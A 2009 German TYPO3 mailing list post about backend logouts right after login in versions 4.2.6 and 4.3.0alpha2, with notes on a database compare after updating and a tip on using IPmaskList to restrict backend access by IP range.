[TYPO3-german] [TYPO3 german] TYPO3 4.2.6 und 4.3.0alpha2 Logout sofort nach Login im Backend

Andreas Becker ab.becker at web.de
Fri Apr 17 17:51:13 CEST 2009

Danke Christian fuer die Erklaerung
Das mit dem Proxy ist schon klar daran hatten wir auch als erstes gedacht,
zumal bei uns ja auslaendische Seitenzugriffe oft noch ueber die Zensur
laufen, da jedoch auch unsere USA und Rumaenien Developer das gleiche
Problem hatten, schlossen wir das Proxy Problem aus - der Server auf den die
Installationen laufen mit den Login Problemen steht in den USA und deren
Techniker konnten auch nix in den Logs feststellen.

Was uns noch aufgefallen ist:
Bei Version 4.1.10 haben wir das problem nicht mit dem Login. Jedoch haben
wir es ab 4.2.2 aufwaerts.
Wir haben einfach einmal die sources durch probiert.

Bei 4.3.0alpha2 ist uns zudem aufgefallen, dass anscheinend ziemlich viele
Tables neu angelegt/geloescht bzw. modifiziert werden. Selbst wenn man von
4.2.6 updated. Als wir den compare bei einem Update von 4.2.6 auf
4.3.0alpha2 durchfuehrten brachte dies eine unendliche liste hervor obwohl
das Update Modul im Installtool angeblich alles bereits erledigt und
abgeschlossen hat. Wir haben den Compare durchgefuehrt und alle checkboxen
gesetzt und nun funktioniert diese Installation gut - aber eben mit dem
iPlog abgeschaltet.

Zum Glueck bietet TYPO3 ja verschiedenste Moeglichkeiten die
Sicherheitslatte hoeher zu setzen.
Eine ist sicher auch

*[IPmaskList]*String. Lets you define a list of IP-numbers (with
*-wildcards) that are the ONLY ones allowed access to ANY backend activity.
On error an error header is sent and the script exits. Works like IP masking
for users configurable through TSconfig. See syntax for that (or look up
syntax for the function t3lib_div::cmpIP())

Somit kann man dann evtl. die Zahl der moeglichen Angreifer moeglichst
eingrenzen, auch wenn man (in unserem Fall der Kunde) keine  Fix IP hat. Man
muss halt die IP Ranges des Providers erfragen und diese hier eingeben.

Das Backend bei den eingegeben IPs wird normal angezeigt und ansonsten
bleibt die Seite weiss - auch die des Installtools!

Gruss Andi